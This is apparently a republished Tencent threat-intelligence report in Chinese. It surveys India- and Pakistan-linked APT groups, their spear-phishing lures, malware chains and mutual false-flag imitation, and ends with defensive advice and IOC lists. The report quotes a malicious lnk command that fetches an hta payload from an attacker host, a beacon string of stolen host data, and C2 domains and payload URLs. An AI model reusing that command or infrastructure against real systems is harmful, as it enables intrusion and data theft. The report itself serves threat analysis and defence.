印巴战争阴影下的网络战——近期印巴APT组织攻击活动汇总
2019-09-10 11:23:24 Author: www.4hou.com(查看原文) 阅读量:122 收藏

一、背景

印度和巴基斯坦同属于南亚地区的两个国家,但是由于一些历史原因,两国关系一直不大和睦,冲突不断。从2019年初开始,双方关系突然紧张,冲突升级。2月26日,印度空军飞越克什米尔印巴实际控制线,被巴基斯坦军方击落并俘获一名印度空军飞行员,同时这也是印度首次袭击巴基斯坦境内。前段时间两国在克什米尔印军队集结并且频繁交火,印方甚至水淹巴基斯坦,打开阿尔奇大坝,造成巴基斯坦面临洪水的危机,同时印方几日前公开宣称,可能会先对巴基斯坦使用核武措施。

随着双方的军事冲突愈演愈烈时,网络战场上也硝烟四起。就在印度空军被俘事件后,腾讯安全御见威胁情报中心曾捕获并发布了一例以此次冲突事件为诱饵的APT攻击样本,分析后确认了该样本源于巴基斯坦的APT攻击组织TransparentTribe(见参考文章1),此外印度针对巴基斯坦的攻击活动也一直在持续中,腾讯安全御见威胁情报中心也曾多次发布相关的分析报告(见参考文章2、3)。

网络战被认为是地缘政治的延伸,甚至是战争和冲突的一部分。APT攻击做为网络战中的重要攻击活动,其活跃趋势跟地缘政治等全球热点问题密切相关,全球APT攻击高发区域也是全球地缘政治冲突的敏感地域。纵观2019年活跃的网络攻击活动,无一不是政治局势复杂和敏感的地域,包括朝鲜半岛、委内瑞拉、中东等等。网络战已成为国家间政治博弈甚至是现代战争的重要组成部分。

回到印巴冲突中,腾讯安全御见威胁情报中心捕获到大量关于印巴网络攻击的恶意样本。经过深度分析和跟踪溯源,我们归类出较为活跃的几个APT组织,包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot,TransparentTribe等。同时在分析溯源的过程中,我们还发现APT组织之间相互伪装,试图来混淆安全人员分析,躲避追踪。本文为对该些活动和组织的一些总结,可能会存在一定的疏漏,还请业内同行再作补充。

二、疑似来自印度的攻击

印方在对巴基斯坦的网络攻击活动中,一直处于强势和主导的地步,还涉及到跟印度相关的APT攻击组织也相对较多,较有代表性的包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot等。

1、SideWinder(响尾蛇)

· 组织概况

SideWinder(响尾蛇)是腾讯安全御见威胁情报中心最早在2018年披露的APT攻击组织,得名由来为该组织的背景跟卡巴斯基在2018年第一季度报告中提到的SideWinder组织非常的相似,虽然卡巴斯基并未发布任何该组织的技术细节和报告。即便如此,我们还是继续沿用卡巴斯基的命名,命名该组织为"响尾蛇"。
该组织的最早的攻击活动可以追溯到 2012 年。在2019年2月,腾讯安全御见威胁情报中心再次详细的披露过该组织在2018年下半年的一些攻击活动。此外,国内有多个安全公司也同时披露过该组织的其他的一些攻击活动。

· 攻击目标

主要为巴基斯坦政府部门(如内阁部门)、巴基斯坦军方、军事目标等。

· 技术手段

SideWinder(响尾蛇)主要采用鱼叉攻击的方式,投递带有漏洞的office文档或者包含恶意lnk的压缩包文件,受害者打开office文档或者恶意lnk文件后会下载执行hta文件,通过执行hta脚本进一步下载后门RAT。

如某次攻击的钓鱼邮件:

image.png

如某次攻击的诱饵:

image.png

压缩包解压后为一个恶意的lnk文件:

image.png

执行命令:

%windir%\system32\mshtb.exe http://www.download.fbr.gov.pk.cdn-ps.net/images/5DC7A431/11991/5183/fad436c7/60b9f1d

执行的脚本后,除了收集本地杀软信息外,还会解密诱饵pdf文件内容并且打开,随着继续下载下一阶段的hta脚本。

打开的诱饵pdf内容为:

image.png

hta脚本为最终会使用一个白加黑技术,来执行最终的后门文件SystemApp.dll,该后门用来进行信息的收集,包括系统信息、文件信息等。

白加黑文件:

image.png

后门内容:

image.png

此外,其他的攻击中,该组织还会使用VB的RAT,如:

image.png

· 组织小结

image.png

2、BITTER(蔓灵花) & Patchwork(白象)& White Company & Confucius(孔子)

· 组织概况

之所以把这几个组织放在一起,是因为我们相信,该四个组织之间都存在一定的关联,甚至为同一组织或同一组织分化出来的不同的小组。如BITTER(蔓灵花)跟Patchwork(白象)和还有Confucius(孔子),我们不止一次的在我们的分析报告中指出存在包括武器库、基础设施等的共用的证据,如《蔓灵花(BITTER)APT组织针对中国境内政府、军工、核能等敏感机构的最新攻击活动报告》等。

其中,蔓灵花最早在2016由美国安全公司Forcepoint进行了披露,并且命名为“BITTER”,得名由来为早期的特马的数据包中都包含字符“BITTER”做为标识,因此得名。同年国内友商360也跟进发布了分析报告,命名为“蔓灵花”。当然该组织除了针对巴基斯坦进行攻击外,也在频繁的针对中国大陆的目标进行攻击活动。

白象组织,也叫摩诃草、Patchwork、HangOver,该最早可以追溯到2009年11月,至今还非常活跃。同样该组织除了针对巴基斯坦进行攻击外,也在频繁的针对中国大陆的目标进行攻击活动。

White Company为2018年由cylance公司披露的APT组织,虽然该公司的报告中未明确指出该组织的背景,但是从我们的分析发现,该组织同样来自印度,并且我们也进一步发现,该组织的武器库和白象相重叠。

Confucius(孔子)为Palo Alto Networks Unit 42在2016年发现针对南亚特定人群的威胁组织。该组织在恶意代码和基础设施上与白象和蔓灵花均存在重叠,但目标稍有不同。

· 攻击目标

image.png

· 技术手段

这几个组织都习惯使用鱼叉攻击的方式,投递含有漏洞或宏的office文档、带有漏洞的InPage文件、自解压文件等。

如蔓灵花的诱饵文档:

image.png

image.png

如白象的诱饵:

image.png

image.png

如Confucius(孔子)的诱饵:

image.png

而执行诱饵文档后,最终的武器库也略有不同。

如蔓灵花:

蔓灵花第一阶段木马一般都为一个downloader,除了下载第二阶段的相关木马外,还会收集用户的相关信息,如上报信息:

"?a=administ-b24c70&b=ADMINIST-B24C70&c=Microsoft%20Windows%20XP&d=AdministratorAdministrator3fb4c154-b52a-4667-8a49-4fbe422781b5365536040965860&e="

上报内容包括主机名、计算机名、操作系统名、用户名等。

而第二阶段为下发相应的插件,插件内容包括添加开机启动、键盘记录、最终的远控木马等。

此外,蔓灵花还存在一些使用习惯,如文件目录习惯使用new_downloader_xxx:

image.png

而下载地址习惯使用healthne:

image.png

如白象:

今年最常使用的特马为名为badnews的特马,使用github和feed43等公用平台用来分发C&C:

image.png

image.png

特马功能:

image.png

· 组织关系

我们之前的文章已经多次指出了BITTER、白象、Confucius之间的关系,本文着重描述下白象跟White Company之间的关系。

如我们从确定白象的某个样本中(97187e5e8b9a752b5f6377df3bea17b5),发现了样本中包含了提权漏洞CVE-2016-7255的模块:

image.png

把该模块dump下来后,根据模块的特征我们进行搜索,发现了某篇文章中:

image.png

跟文章中的代码完全相似(https://www.alienvault.com/blogs/labs-research/off-the-shelf-rats-targeting-pakistan):

image.png

而我们队该漏洞的所有公开利用的代码经过搜寻,以及对该模块的特征进行搜索,均未在其他的攻击活动中发现跟该模块匹配的利用代码和代码结构,因此我们判断该特权利用模块为该组织特有,而该文章曝光的活动的组织跟白象为同一个或者能通用武器库的攻击小组。

而继续对该文章中披露的组织进行研究,我们发现该攻击组织就位cylance曝光的White Company:

image.png

image.png

· 组织小结

image.png

3、Donot Team

· 组织概况

Donot Team是2018年被曝光的APT攻击组织,最早在2018年3月由NetScout公司的ASERT团队进行了披露,随后国内的厂商奇安信也进行了披露。该组织的得名由来为某攻击文件中的pdb中含有donot(如样本59733668b3ad8056ffd4c5c9db876cbc,pdb为:C:\Users\donot\Documents\Visual Studio 2010\Projects\downloader\Debug\downloader.pdb),因此取名为Donot Team,国内的安全厂商奇安信通过音译命名为肚脑虫,我们继续沿用该命名。该组织主要针对巴基斯坦进行攻击活动。

· 攻击目标

巴基斯坦政府部门、巴基斯坦军方、金融机构、外贸人士等。

· 技术手段

Donot Team通常会投递带有恶意宏的office文档文件,文档名和文档内容都具有很强的针对性。

如使用巴基斯坦空军的诱饵:

image.png

如伪装巴基斯坦国家银行Excel计算器:

image.png

当受害者打开office恶意样本后,会提示执行宏代码,点击执行后会释放包含脚本和后门程序的压缩包,然后解压执行脚本,脚本最终会启动后门木马。

相关宏代码:

image.png

释放的压缩包:

image.png

执行脚本代码:

image.png

最终执行的恶意文件,会根据返回的Content-Typel来进行下一步行为:

1) 当返回的为application时则会将返回的包解码exe后存储到  %userprofile%\\DriveData\\Files\\目录下。

2) 当返回的是cmdline时,则会执行%userprofile%\\DriveData\\Files\\wuaupdt.exe

3) 当返回的是batcmd的时,则会执行%userprofile%\\DriveData\\Files\\test.bat

4) 除了windows上的攻击外,Donot Team还拥有移动端的攻击能力。如使用安卓特马StealJob的攻击流程(来源奇安信博客分析,见参考文章4):

image.png

相关功能:

image.png

· 组织小结

image.png

三、疑似来自巴基斯坦的攻击

巴方在对印度的网络攻击活动中,一直处于弱势和挨打的地位,目前发现的相关的APT攻击组织也相对较少,较有代表性的是TransparentTribe。

· 组织概况

TransparentTribe APT组织,又称ProjectM、C-Major,该组织的活动最早可以追溯到2012年。该组织的相关活动在2016年3月被proofpoint披露,趋势科技随后也跟进进行了相关活动的披露。

腾讯安全御见威胁情报中心曾在上半年曝光过该组织的相关攻击活动《TransparentTribe APT组织2019年针对印度政府、军事目标的攻击活动报告》。

· 攻击目标

印度政府、印度军方、军事研究机构等。

· 技术手段

TransparentTribe通常投递带有恶意宏的office文档,诱饵文档内容多与政府、军事相关,当受害者打开恶意文档后,会提示执行宏代码,一般点击执行后诱饵内容才会显示出来。

如跟印度陆战研究中心(CLAWS)相关诱饵:

image.png

如跟印度国防学院(NDC)相关诱饵: 

image.png

宏代码执行后会释放一个压缩包文件,并解压出包含的木马后门执行:

image.png

在后门使用上,该组织依旧使用CrimsonRAT、.net loader、.net droper、PeppyRAT 相关特马:

image.png

而经过腾讯安全御见威胁情报中心的数据溯源,该组织疑似跟巴基斯坦另外一个组织Gorgon Group有一定的关联: 

image.png

· 组织小结

image.png

四、存在的假旗(false flag)

在印巴双方网络战持续不断时,其中Donot Team和TransparentTribe 两个APT组织引起我们格外的注意,经过详细分析后发现两个疑似敌对组织不断的互相模仿,影响安全研究人员对其追踪溯源。

例如Donot样本宏代码和TransparentTribe样本宏代码高度相似,可以看到Donot宏代码注释的地方,注释的这段代码是要执行的exe路径,但是Donot实际上执行的是bat脚本,我们再对比下TransparentTribe就能发现,TransparentTribe才是执行exe的。并且Donot样本中这段被注释的代码与TransparentTribe样本中的一致(左边Donot,右边TransparentTribe):

image.png

并且部分代码函数都是一模一样的,函数命名和常量值(左边Donot,右边TransparentTribe):

image.png

甚至在某些样本中两个APT组织释放的木马名称都完全一样(左边Donot,右边TransparentTribe): 

image.png

我们相信,印巴双方的组织还会继续模仿下去,这势必给安全研究人员在定性上产生更多的干扰。

五、总结

从上文可以看到,由于印巴两国的长期以来的紧张关系,网络攻击一直都没停止过。即便两国的活动多次被安全公司所曝光,但是各自国家的组织完全没停止攻击的意思,相反是越来越猛烈。2019年对印巴两国来说,是个不平静的一年,双边的局势冲突不断,网络战也一浪高过一浪。我们相信,这种网络抗衡会持续进行下去。

没有网络安全就没有国家安全,随着政治局势的恶化,网络战势必会愈演愈烈。虽然我们处于和平年代,但是我们的相关部门和单位切记要提高警惕,保障重点部门和单位的网络安全。

六、安全建议

针对重要政府机构、重点企业、科研单位的APT攻击,已经成为网络战背景下的日常偷袭活动,攻击者平时以刺探情报、入侵渗透为主,一旦冲突加剧,随时可能提升攻击破坏的烈度。腾讯安全专家建议相关敏感单位加强网络信息系统安全管理,加强对员工的安全意识教育,防患于未然。可参考以下几点:

1、建议不要打开不明来源的邮件附件;除非非常清楚文档来源可靠,否则建议不要启用Office执行宏代码;

2、及时安装系统补丁和重要软件的补丁;

3、使用杀毒软件防御可能的病毒木马攻击。

IOCs

MD5:

050dd090b5af80fb73b2d6e6c8a3adc9

d78d30c43bdd0251fce773376a2eca24

4d59b084df25e9c6cba6343b753077b3

86938e9ed38f59630ee2318ad5a91f30

7b6fb1c1cf09cb371f8a22ac3c19da10

f64125c34cb209c71ca137513bf9714b

35a9d47a8b6d0fab0a8bfdf1b1381486

9eb7cbd46aa2aa624ae13acb64394b1c

6d3e9283b52086a406358ca914e23837

afffa7af5e795f911434b6e7016fc6e5

3c06cbcb6bb57b688ca30659c6c031a5

e9c8d0d4c74d53566b446e1242947e15

23b4dbbe5f3a44798312c1fd66117221

42b713a261d61c5c00b7704ae1f4b912

561adc55d8a9bf9d6966f7dd234d1e20

a66aa5eb35c67f685cc425c1d04d0f5f

cf665bbf0c208e5eb29ad99f9154bf3e

a6270064f1630cdf5bcda858762db516

7f99acb32db8b99fbe9347d3e69e9063

0a3a423d5cd7628efcc12cdbce378edf

0108a194e11a2d871f5571108087c05d

f7d2b9541d9035d31c637d39d88d18a7

08a8db28207fa13ebb25cf0064d12f17

9c6999f6b2415761fa85d6391dfb4628

f5a5f7af4e46e89e9f2a84cc293f1250

0fa9b24535f55ec64be0f02a75d637b3

43a2dad49d410b143b8a26772d6e71dd

159890b8b9e66cc8138d332d860ddd96

4d401db3dc6172e7b16bcbe7d87fc526

02ba9703d1f250b411ea4c868d17fd2e

db5193d53f7bb509928304ad8326f359

8d8822326f53982b141dc0e7f6cf948a

91e5c5afcf42f8912d5ae3b7dafcda22

96e351e7faf7197677e58a1f6390b0f0

babca0f4ccca5c46f6145580a92284f9

427d28ebedbe8b2b730de1d34435dcb8

URL:

https://trans-pre.net/ini/sJDts1oInx8fbn0ffcxa3R6L82v5k8Ali9eiPb78/11991/5183/be30afa8

http://www.download.fbr.gov.pk.cdn-ps.net/plugins/11991/5183/true/true/

http://www.download.fbr.gov.pk.cdn-ps.net/cgi/8ee4d36866/11991/5183/aca094d0/file.hta

http://www.download.fbr.gov.pk.cdn-ps.net/images/5DC7A431/11991/5183/fad436c7/60b9f1d

http://www.cdn-ps.net/plugins/-1/9373/true/true/

http://www.cdn-ps.net/cgi/8ee4d36866/-1/9373/34f1d81f/file.hta

https://trans-pre.net/ini/NrveX8Yi7Mgr06nqM86Wba9uW8LdbbJ2HAaB9zWG/-1/9373/8a7b946c

C&C:

185.99.133.27

data-backup.online

unique.fontsupdate.com

servicejobs.life

212.32.226.244

111.115.60.18

ezeescan.com

95.168.176.141

参考资料

1) TransparentTribe APT组织2019年针对印度政府、军事目标的攻击活动报告https://s.tencent.com/research/report/669.html

2) 响尾蛇(SideWinder)APT组织针对南亚的攻击活动披露https://s.tencent.com/research/report/659.html 

3) 疑似白象组织针对巴基斯坦、孟加拉国等南亚国家的最新攻击活动报告https://s.tencent.com/research/report/711.html

4) 肚脑虫团伙利用新特种安卓木马StealJob的攻击分析https://ti.qianxin.com/blog/articles/stealjob-new-android-malware-used-by-donot-apt-group/ 

5) https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf 

6) 针对巴基斯坦的RAT

https://www.alienvault.com/blogs/labs-research/off-the-shelf-rats-targeting-pakistan


文章来源: https://www.4hou.com/info/observation/20241.html
如有侵权请联系:admin#unsafe.sh